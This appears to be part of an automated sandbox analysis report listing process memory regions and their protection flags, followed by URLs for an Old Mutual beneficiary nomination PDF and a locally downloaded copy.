274143DE000
heap
page read and write
274143D3000
heap
page read and write
2567B178000
heap
page read and write
1EF63847000
heap
page read and write
1EC19008000
heap
page read and write
1EF63E3A000
heap
page read and write
55D000
heap
page read and write
D0E0000
trusted library allocation
page read and write
2567B206000
heap
page read and write
B073000
heap
page read and write
1F4007E0000
trusted library allocation
page read and write
1C76F490000
heap
page read and write
27413BD7000
heap
page read and write
42B000
unkown
page readonly
2026B3D2000
heap
page read and write
1C76F1C3000
heap
page read and write
2645E304000
heap
page read and write
7D031FE000
stack
page read and write
2645931B000
heap
page read and write
21DF5399000
heap
page read and write
B2B7000
heap
page read and write
7D034FE000
unkown
page readonly
26458A77000
heap
page read and write
A8B2000
heap
page read and write
1C76F932000
heap
page read and write
1F4006F3000
heap
page read and write
1C76F204000
heap
page read and write
5A3000
heap
page read and write
D26087A000
stack
page read and write
2645931A000
heap
page read and write
1EF63800000
heap
page read and write
9D000
stack
page read and write
26458A00000
heap
page read and write
2645E100000
remote allocation
page read and write
1F4006C0000
heap
page read and write
274143DA000
heap
page read and write
1C76F3D0000
trusted library allocation
page read and write
1EC18A39000
heap
page read and write
1F400C2A000
heap
page read and write
203B0640000
heap
page read and write
59E000
heap
page read and write
562000
heap
page read and write
26459B80000
trusted library section
page readonly
1F400715000
heap
page read and write
7D035FC000
stack
page read and write
2567B170000
heap
page read and write
1C76F210000
heap
page read and write
B18C000
heap
page read and write
1C76F1F9000
heap
page read and write
1EC18A36000
heap
page read and write
1C76F42A000
heap
page read and write
4C7000
heap
page read and write
19D000
stack
page read and write
2026AE2A000
heap
page read and write
27413C1B000
heap
page read and write
562000
heap
page read and write
274143E0000
heap
page read and write
2645E30D000
heap
page read and write
27E0000
heap
page read and write
1EC1AB20000
heap
page read and write
27413D90000
trusted library allocation
page read and write
2026AE92000
heap
page read and write
1C76F92C000
heap
page read and write
26459941000
trusted library allocation
page read and write
21DF5340000
heap
page read and write
19C4D968000
heap
page read and write
1EF63F92000
heap
page read and write
27413BB0000
trusted library allocation
page read and write
274143D0000
heap
page read and write
27413BF7000
heap
page read and write
C6CF000
heap
page read and write
2645DF90000
trusted library allocation
page read and write
1F400715000
heap
page read and write
BA8C000
heap
page read and write
27413C2B000
heap
page read and write
1F4006E9000
heap
page read and write
26459302000
heap
page read and write
27413D90000
trusted library allocation
page read and write
1EC19000000
heap
page read and write
CBED67E000
stack
page read and write
D2609FE000
stack
page read and write
2026AE25000
heap
page read and write
1EF63F92000
heap
page read and write
586000
heap
page read and write
2645E290000
heap
page read and write
2026ADF0000
heap
page read and write
27413C12000
heap
page read and write
9D7000
heap
page read and write
1EC191CA000
heap
page read and write
274143E8000
heap
page read and write
38C3D7F000
stack
page read and write
26458A72000
heap
page read and write
2567B206000
heap
page read and write
27413C14000
heap
page read and write
1EC18A49000
heap
page read and write
A783000
heap
page read and write
29C3000
heap
page read and write
2645E300000
heap
page read and write
274143D4000
heap
page read and write
A78F000
heap
page read and write
1EC18930000
heap
page read and write
2567B226000
heap
page read and write
1EF6383B000
heap
page read and write
21DF5374000
heap
page read and write
562000
heap
page read and write
1EF63852000
heap
page read and write
21DF5369000
heap
page read and write
2567B201000
heap
page read and write
1EF63817000
heap
page read and write
A1CC9FE000
stack
page read and write
26458B13000
heap
page read and write
2567B202000
heap
page read and write
27413BD7000
heap
page read and write
BCC0000
trusted library allocation
page read and write
1C76F1F9000
heap
page read and write
A1CC8FF000
stack
page read and write
1EF63A30000
trusted library allocation
page read and write
203B0598000
heap
page read and write
203B2260000
heap
page read and write
1EF63852000
heap
page read and write
2567B203000
heap
page read and write
2830000
heap
page read and write
2645DFBE000
trusted library allocation
page read and write
2026AD70000
heap
page read and write
1EF63E3B000
heap
page read and write
A786000
heap
page read and write
2800000
heap
page read and write
434507D000
stack
page read and write
2567B209000
heap
page read and write
1C76F42E000
heap
page read and write
1F400845000
heap
page read and write
274143DB000
heap
page read and write
2EB5000
heap
page read and write
1F400C2A000
heap
page read and write
1EC191C4000
heap
page read and write
1EC18A54000
heap
page read and write
1C76F211000
heap
page read and write
21DF5413000
heap
page read and write
1F400D84000
heap
page read and write
1F400734000
heap
page read and write
26458A8C000
heap
page read and write
2026AE2E000
heap
page read and write
2645E2C4000
heap
page read and write
1F400C2E000
heap
page read and write
132CAFE000
stack
page read and write
7D0407E000
stack
page read and write
1EC18A60000
heap
page read and write
A780000
trusted library allocation
page read and write
2645DFA0000
trusted library allocation
page read and write
2567B206000
heap
page read and write
1EF63E37000
heap
page read and write
1EF63852000
heap
page read and write
1F40071E000
heap
page read and write
26459B50000
trusted library section
page readonly
1C771380000
heap
page read and write
2E10000
heap
page read and write
1EC18950000
heap
page read and write
2645DEE0000
trusted library allocation
page read and write
1EC18970000
trusted library allocation
page read and write
532757F000
stack
page read and write
59D000
heap
page read and write
2567B1F6000
heap
page read and write
2567B1A1000
heap
page read and write
2645E256000
heap
page read and write
456000
unkown
page write copy
29C5000
heap
page read and write
A67A000
heap
page read and write
274143DA000
heap
page read and write
1EF63E33000
heap
page read and write
27413C06000
heap
page read and write
1F4007E0000
trusted library allocation
page read and write
2645DF60000
trusted library allocation
page read and write
42B000
unkown
page readonly
2645E302000
heap
page read and write
2980000
heap
page read and write
19C4D870000
heap
page read and write
27413C2B000
heap
page read and write
2645E251000
heap
page read and write
A8B5000
heap
page read and write
1EF63F80000
heap
page read and write
EDF56FE000
stack
page read and write
2E30000
heap
page read and write
2026AE92000
heap
page read and write
2567B1FA000
heap
page read and write
1EC18A52000
heap
page read and write
A786000
heap
page read and write
29C0000
heap
page read and write
1EF63E3A000
heap
page read and write
7D03B7E000
stack
page read and write
7D032FE000
unkown
page readonly
2300000
heap
page read and write
2B9F000
stack
page read and write
26459EE0000
trusted library allocation
page read and write
22AD000
stack
page read and write
D26097F000
stack
page read and write
1C76F424000
heap
page read and write
1C76F210000
heap
page read and write
EDF55FD000
stack
page read and write
274143D7000
heap
page read and write
2026AD90000
heap
page read and write
1EC18A18000
heap
page read and write
3A1000
unkown
page execute read
27413B60000
heap
page read and write
274143F2000
heap
page read and write
A676000
heap
page read and write
1F400C23000
heap
page read and write
2645E0A0000
trusted library allocation
page read and write
27413C15000
heap
page read and write
573000
heap
page read and write
2645E2E7000
heap
page read and write
2567B010000
heap
page read and write
26458A92000
heap
page read and write
A249000
heap
page read and write
2567B206000
heap
page read and write
7D030FE000
unkown
page readonly
2026B3C7000
heap
page read and write
2026B3D2000
heap
page read and write
26459840000
trusted library allocation
page read and write
2026B3D4000
heap
page read and write
2567CB95000
heap
page read and write
7D03AFE000
unkown
page readonly
2026AE57000
heap
page read and write
2645E319000
heap
page read and write
1C76F1E7000
heap
page read and write
2026AE86000
heap
page read and write
1EC18A09000
heap
page read and write
B079000
heap
page read and write
1F40071E000
heap
page read and write
1F400D78000
heap
page read and write
38C3DFE000
stack
page read and write
1EC19012000
heap
page read and write
1F400C20000
heap
page read and write
573000
heap
page read and write
1EC18A00000
heap
page read and write
2026AE48000
heap
page read and write
1F400D70000
heap
page read and write
19C4D98B000
heap
page read and write
B073000
heap
page read and write
27413C00000
heap
page read and write
D2608FE000
stack
page read and write
D668FD000
stack
page read and write
7D040FE000
unkown
page readonly
A8BA000
heap
page read and write
259C000
stack
page read and write
1C76F1EB000
heap
page read and write
27413BD2000
heap
page read and write
1C76F1B9000
heap
page read and write
27413BFB000
heap
page read and write
B183000
heap
page read and write
1F400C2A000
heap
page read and write
2260000
heap
page read and write
2ABF000
stack
page read and write
A6CC000
heap
page read and write
2026AE00000
heap
page read and write
26458B02000
heap
page read and write
B18F000
heap
page read and write
1F4005C0000
heap
page read and write
1C76F49B000
heap
page read and write
27413BF5000
heap
page read and write
1C76F420000
heap
page read and write
27A8000
heap
page read and write
7D03CFE000
unkown
page readonly
274143D7000
heap
page read and write
2026AF40000
trusted library allocation
page read and write
7D03BFE000
unkown
page readonly
1C76F390000
heap
page read and write
1EC18CB5000
heap
page read and write
19C4DC05000
heap
page read and write
21DF540B000
heap
page read and write
1C76F1C2000
heap
page read and write
19C4DA80000
heap
page read and write
27413C1A000
heap
page read and write
2567B203000
heap
page read and write
1F400D77000
heap
page read and write
2026AE9C000
heap
page read and write
32F0000
heap
page read and write
38C3E7E000
stack
page read and write
26459B70000
trusted library section
page readonly
A673000
heap
page read and write
1EF63855000
heap
page read and write
27413C02000
heap
page read and write
7D03D7E000
stack
page read and write
2567B1FA000
heap
page read and write
7D03F7E000
stack
page read and write
26459A60000
trusted library allocation
page read and write
1EF63A9B000
heap
page read and write
2026AE2E000
heap
page read and write
1EF63910000
heap
page read and write
27413EB0000
heap
page read and write
A679000
heap
page read and write
2567B206000
heap
page read and write
1C76F210000
heap
page read and write
1F4007E0000
trusted library allocation
page read and write
1C76F1F5000
heap
page read and write
2567B201000
heap
page read and write
27413C12000
heap
page read and write
2026AE22000
heap
page read and write
27A0000
heap
page read and write
2026B3C0000
heap
page read and write
1EF63852000
heap
page read and write
1EC18970000
trusted library allocation
page read and write
1F400C2B000
heap
page read and write
7D038FE000
unkown
page readonly
26459B40000
trusted library section
page readonly
22F0000
heap
page read and write
27413C1A000
heap
page read and write
1EF63F8C000
heap
page read and write
2E90000
heap
page read and write
21DF7360000
heap
page read and write
2567B1B4000
heap
page read and write
255B000
stack
page read and write
2567B1A3000
heap
page read and write
1EC191CE000
heap
page read and write
2567B1FA000
heap
page read and write
27413C02000
heap
page read and write
27413BB0000
trusted library allocation
page read and write
2026AE92000
heap
page read and write
1F400720000
heap
page read and write
2645DF50000
trusted library allocation
page read and write
1F400840000
heap
page read and write
132CA7F000
stack
page read and write
2645DF90000
trusted library allocation
page read and write
2567CB90000
heap
page read and write
2026AE78000
heap
page read and write
434517F000
stack
page read and write
2645E0B0000
trusted library allocation
page read and write
A471000
heap
page read and write
2645E30A000
heap
page read and write
26458AFF000
heap
page read and write
7D037FB000
stack
page read and write
2E9C000
heap
page read and write
27413C05000
heap
page read and write
2567B1FA000
heap
page read and write
2567B1A8000
heap
page read and write
1EF63E34000
heap
page read and write
27413BF8000
heap
page read and write
19C4F5A0000
heap
page read and write
21DF5408000
heap
page read and write
274143DA000
heap
page read and write
19C4D960000
heap
page read and write
1EF63A30000
trusted library allocation
page read and write
1EC191CA000
heap
page read and write
26458AAC000
heap
page read and write
7D044FE000
unkown
page readonly
1C76F934000
heap
page read and write
1F400C2E000
heap
page read and write
45E000
unkown
page readonly
276E000
stack
page read and write
1C76F1C7000
heap
page read and write
1F400720000
heap
page read and write
E5FD6EA000
stack
page read and write
EDF57FF000
stack
page read and write
1EC1900C000
heap
page read and write
2E0E000
stack
page read and write
315F000
unkown
page read and write
38C3CFF000
stack
page read and write
2645930C000
heap
page read and write
2330000
heap
page read and write
1EF639F0000
heap
page read and write
2567B1F6000
heap
page read and write
2567B203000
heap
page read and write
26459202000
heap
page read and write
29A0000
heap
page read and write
27413B90000
heap
page read and write
26458A9D000
heap
page read and write
1EC19012000
heap
page read and write
2567B222000
heap
page read and write
2645E2BD000
heap
page read and write
2645E040000
trusted library allocation
page read and write
26459591000
trusted library allocation
page read and write
1EC18A69000
heap
page read and write
1EF6383B000
heap
page read and write
298A000
heap
page read and write
A231000
heap
page read and write
EDF58FB000
stack
page read and write
2567B203000
heap
page read and write
1EC18970000
trusted library allocation
page read and write
2026AE23000
heap
page read and write
1C76F3D0000
trusted library allocation
page read and write
A670000
heap
page read and write
2026AE77000
heap
page read and write
1C76F3D0000
trusted library allocation
page read and write
274143D2000
heap
page read and write
A670000
trusted library allocation
page read and write
CBED6FE000
stack
page read and write
2645DF60000
trusted library allocation
page read and write
21DF6F50000
heap
page read and write
274143DE000
heap
page read and write
2567B202000
heap
page read and write
2567B1FA000
heap
page read and write
7D04C7E000
stack
page read and write
1C76F42A000
heap
page read and write
1EC18A54000
heap
page read and write
2CB0000
heap
page read and write
2026AE79000
heap
page read and write
2EB0000
heap
page read and write
27413C00000
heap
page read and write
27413ECB000
heap
page read and write
1EC18A54000
heap
page read and write
27C0000
heap
page read and write
2567CB9C000
heap
page read and write
57C000
heap
page read and write
573000
heap
page read and write
57C000
heap
page read and write
2645E221000
heap
page read and write
27413C1E000
heap
page read and write
A330000
trusted library allocation
page read and write
2567CD70000
heap
page read and write
2567B1AC000
heap
page read and write
274143F2000
heap
page read and write
42B000
unkown
page readonly
1C76F1EB000
heap
page read and write
564000
heap
page read and write
27413C2B000
heap
page read and write
27413DB0000
heap
page read and write
27413BF9000
heap
page read and write
EDF50FE000
stack
page read and write
2645E292000
heap
page read and write
567000
heap
page read and write
203B0645000
heap
page read and write
CBED347000
stack
page read and write
A340000
trusted library allocation
page read and write
7D043FC000
stack
page read and write
21DF53CD000
heap
page read and write
2C00000
heap
page read and write
E5FDAFE000
stack
page read and write
2026AE95000
heap
page read and write
27413EC5000
heap
page read and write
9D7000
heap
page read and write
26458A2B000
heap
page read and write
27413C12000
heap
page read and write
1EC191CB000
heap
page read and write
27413C1A000
heap
page read and write
1EF63839000
heap
page read and write
27413C12000
heap
page read and write
D6687A000
stack
page read and write
7D033F9000
stack
page read and write
2567B1C9000
heap
page read and write
BB9F000
heap
page read and write
1F400D7C000
heap
page read and write
B076000
heap
page read and write
1C76F3B0000
heap
page read and write
2567B1F6000
heap
page read and write
A1CC59F000
stack
page read and write
2026ADB0000
trusted library allocation
page read and write
23AD000
stack
page read and write
1F4006F2000
heap
page read and write
4344CB7000
stack
page read and write
2645E100000
remote allocation
page read and write
2026AE85000
heap
page read and write
2026ADFB000
heap
page read and write
21DF5360000
heap
page read and write
D66A7F000
stack
page read and write
B077000
heap
page read and write
26459B90000
trusted library section
page readonly
1C76F1B0000
heap
page read and write
B18D000
heap
page read and write
2026B3C8000
heap
page read and write
264589B0000
heap
page read and write
1C76F920000
heap
page read and write
27C7000
heap
page read and write
1EC18A13000
heap
page read and write
A8B2000
heap
page read and write
26459970000
trusted library allocation
page read and write
132C79B000
stack
page read and write
1F4006F7000
heap
page read and write
A570000
trusted library allocation
page read and write
B2B2000
heap
page read and write
1C76F42A000
heap
page read and write
1F400740000
heap
page read and write
CE90000
trusted library allocation
page read and write
203B0528000
heap
page read and write
1EF63A95000
heap
page read and write
28EF000
unkown
page read and write
2567CAD0000
heap
page read and write
26458ABD000
heap
page read and write
BCC0000
trusted library allocation
page read and write
2567B130000
heap
page read and write
2567CD73000
heap
page read and write
264589A0000
heap
page read and write
27413C12000
heap
page read and write
1EC18A54000
heap
page read and write
1F400C25000
heap
page read and write
2026ADF5000
heap
page read and write
2645E100000
remote allocation
page read and write
1EF63F94000
heap
page read and write
2026AE24000
heap
page read and write
1F400719000
heap
page read and write
B2B2000
heap
page read and write
203B0520000
heap
page read and write
26458A13000
heap
page read and write
1C76F2B0000
heap
page read and write
D669FE000
stack
page read and write
2810000
heap
page read and write
1EF63854000
heap
page read and write
1F40071A000
heap
page read and write
2567B1C4000
heap
page read and write
1C76F928000
heap
page read and write
1F400715000
heap
page read and write
1C76F423000
heap
page read and write
1EC18970000
trusted library allocation
page read and write
2567B201000
heap
page read and write
A677000
heap
page read and write
2645DF80000
trusted library allocation
page read and write
1EF63846000
heap
page read and write
1EF63817000
heap
page read and write
55E000
heap
page read and write
1EF63812000
heap
page read and write
2567B209000
heap
page read and write
2645F000000
heap
page read and write
2567B1F6000
heap
page read and write
2026B3CC000
heap
page read and write
1F400C24000
heap
page read and write
1EF63E30000
heap
page read and write
1EF63E35000
heap
page read and write
1C76F1E9000
heap
page read and write
3A1000
unkown
page execute read
2026AE52000
heap
page read and write
456000
unkown
page write copy
B186000
heap
page read and write
2026AE7B000
heap
page read and write
1F4006A0000
heap
page read and write
2645DF64000
trusted library allocation
page read and write
D260AFE000
stack
page read and write
55A000
heap
page read and write
5A3000
heap
page read and write
1EC191CE000
heap
page read and write
2567B1F6000
heap
page read and write
7D02C7B000
stack
page read and write
E5FDB7E000
stack
page read and write
2645931A000
heap
page read and write
532767E000
stack
page read and write
1EF63A30000
trusted library allocation
page read and write
2645E244000
heap
page read and write
1EC18850000
heap
page read and write
2567B1F6000
heap
page read and write
7D03C7E000
stack
page read and write
2567B203000
heap
page read and write
1F400733000
heap
page read and write
7D039FB000
stack
page read and write
1EC18CB0000
heap
page read and write
2645E0C0000
trusted library allocation
page read and write
2026AF40000
trusted library allocation
page read and write
26459300000
heap
page read and write
2567CAB0000
trusted library allocation
page read and write
1EC19007000
heap
page read and write
1EC191CA000
heap
page read and write
A6CD000
heap
page read and write
2026AE27000
heap
page read and write
9D7000
heap
page read and write
2645E25A000
heap
page read and write
A8BB000
heap
page read and write
2645E211000
heap
page read and write
1EC18A69000
heap
page read and write
203B0599000
heap
page read and write
1EF63A30000
trusted library allocation
page read and write
27413C1F000
heap
page read and write
2026AE94000
heap
page read and write
1C76F1EB000
heap
page read and write
7D041FE000
unkown
page readonly
2645E2ED000
heap
page read and write
7D045FB000
stack
page read and write
2645DF62000
trusted library allocation
page read and write
1EF63852000
heap
page read and write
1F400C22000
heap
page read and write
274143F4000
heap
page read and write
26459215000
heap
page read and write
7D04CFE000
unkown
page readonly
26459B60000
trusted library section
page readonly
1EC19014000
heap
page read and write
2567B1FA000
heap
page read and write
203B0552000
heap
page read and write
1EF659E0000
heap
page read and write
2567B1D0000
heap
page read and write
27413C1F000
heap
page read and write
2026CE00000
heap
page read and write
7D02FF7000
stack
page read and write
D66AFE000
stack
page read and write
2567B201000
heap
page read and write
2567B206000
heap
page read and write
1F4007E0000
trusted library allocation
page read and write
2645935A000
heap
page read and write
21DF5330000
heap
page read and write
579000
heap
page read and write
BCCF000
heap
page read and write
1EC189A0000
heap
page read and write
19C4DA60000
heap
page read and write
2026AE2B000
heap
page read and write
2567B1FA000
heap
page read and write
1C76F425000
heap
page read and write
1EC18A48000
heap
page read and write
27413B70000
heap
page read and write
1F400BC0000
heap
page read and write
2645E030000
trusted library allocation
page read and write
43451FB000
stack
page read and write
BA80000
trusted library allocation
page read and write
325F000
stack
page read and write
3A1000
unkown
page execute read
2645E200000
heap
page read and write
2645DF61000
trusted library allocation
page read and write
1EF63E32000
heap
page read and write
1F400C27000
heap
page read and write
2567EBD0000
trusted library allocation
page read and write
26458980000
heap
page read and write
C6CF000
heap
page read and write
45E000
unkown
page readonly
1EC18A3A000
heap
page read and write
7D042FE000
unkown
page readonly
2567B0F0000
heap
page read and write
A673000
heap
page read and write
2645E0B0000
trusted library allocation
page read and write
A6EB000
heap
page read and write
43450FE000
stack
page read and write
2026AE92000
heap
page read and write
55D000
heap
page read and write
1EF63A10000
heap
page read and write
2D3D000
stack
page read and write
B2BB000
heap
page read and write
1EF63A90000
heap
page read and write
1C76F427000
heap
page read and write
296E000
stack
page read and write
272E000
unkown
page read and write
2645E090000
trusted library allocation
page read and write
1F4006EE000
heap
page read and write
1C76F932000
heap
page read and write
2DCE000
unkown
page read and write
1C76F1EA000
heap
page read and write
27C3000
heap
page read and write
2645DF40000
trusted library allocation
page read and write
21DF5391000
heap
page read and write
1EC191C7000
heap
page read and write
E5FDA7F000
stack
page read and write
D6697F000
stack
page read and write
2567B1FA000
heap
page read and write
2567B201000
heap
page read and write
B07A000
heap
page read and write
2026AE2A000
heap
page read and write
2026AC90000
heap
page read and write
A8B7000
heap
page read and write
2610000
heap
page read and write
19C4DC00000
heap
page read and write
53274FF000
stack
page read and write
1C76F205000
heap
page read and write
577000
heap
page read and write
1F4006E0000
heap
page read and write
2770000
heap
page read and write
3A0000
unkown
page readonly
27413C00000
heap
page read and write
2645E22E000
heap
page read and write
1C76F42E000
heap
page read and write
53276FE000
stack
page read and write
CBED3CE000
stack
page read and write
1F400715000
heap
page read and write
44F0000
heap
page read and write
2026AE27000
heap
page read and write
1F40071E000
heap
page read and write
B2BA000
heap
page read and write
A78D000
heap
page read and write
26458A7A000
heap
page read and write
B189000
heap
page read and write
203B0650000
heap
page read and write
3A0000
unkown
page readonly
27413BF6000
heap
page read and write
26458A5C000
heap
page read and write
274143D5000
heap
page read and write
2C3D000
stack
page read and write
4344D3E000
stack
page read and write
274143E7000
heap
page read and write
2567B1EE000
heap
page read and write
2645DF10000
trusted library allocation
page read and write
203B05C0000
heap
page read and write
1F400810000
heap
page read and write
E5FD7EE000
stack
page read and write
1C76F400000
heap
page read and write
C483000
heap
page read and write
1C76F1C7000
heap
page read and write
1EF6383D000
heap
page read and write
2D80000
heap
page read and write
1EF63838000
heap
page read and write
1EC191C7000
heap
page read and write
2645DFA4000
trusted library allocation
page read and write
456000
unkown
page write copy
1EF6385E000
heap
page read and write
A241000
heap
page read and write
2026AE40000
heap
page read and write
CBED7FF000
stack
page read and write
2567B206000
heap
page read and write
1C76F1E5000
heap
page read and write
EDF52FF000
stack
page read and write
26458A41000
heap
page read and write
7D03DFE000
unkown
page readonly
1C76F42B000
heap
page read and write
A78C000
heap
page read and write
EDF4EFA000
stack
page read and write
2026AE92000
heap
page read and write
1F400D82000
heap
page read and write
EDF53FE000
stack
page read and write
532747A000
stack
page read and write
1EF63F88000
heap
page read and write
264589F0000
trusted library section
page read and write
2567B1F6000
heap
page read and write
E5FD76D000
stack
page read and write
1EC18A37000
heap
page read and write
1EF63A60000
heap
page read and write
2567B201000
heap
page read and write
3A0000
unkown
page readonly
27413EC0000
heap
page read and write
2567D0C0000
heap
page read and write
1C76F427000
heap
page read and write
A1CC97F000
stack
page read and write
21DF5530000
heap
page read and write
7D0427E000
stack
page read and write
21DF55E5000
heap
page read and write
26458A7C000
heap
page read and write
1EF63E3A000
heap
page read and write
1F40084B000
heap
page read and write
2567B1F6000
heap
page read and write
7D046FE000
unkown
page readonly
579000
heap
page read and write
4344DBE000
stack
page read and write
There are 776 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
file:///C:/Users/user/Downloads/downloaded.pdf
file:///C:/Users/user/Downloads/downloaded.pdf